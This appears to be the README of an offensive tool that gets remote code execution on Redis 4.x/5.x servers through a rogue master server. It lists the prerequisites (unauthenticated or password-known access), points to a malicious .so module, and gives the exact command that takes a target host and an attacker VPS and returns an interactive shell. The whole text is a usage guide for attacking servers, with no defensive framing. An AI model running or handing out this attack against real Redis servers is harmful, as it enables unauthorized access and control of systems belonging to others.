tech reference: Redis post-exploitation.
test passed by Redis 5.0.9.
- Redis 4.x/5.x unauthorized access or you know its auth password.
- your PC and target Redis can comm with each other.
- compile
.so
module, reference: https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
python3 redis-rogue-server.py --rhost <target address> [--rport <target port>] --lhost <vps address> [--lport <vps port>] [--so <.so filename>] [--rpasswd <redis auth>]
Finally, you will get a interactive shell. Use exit
to quit and clean rhost server or use ctrl-C
to quit without clean.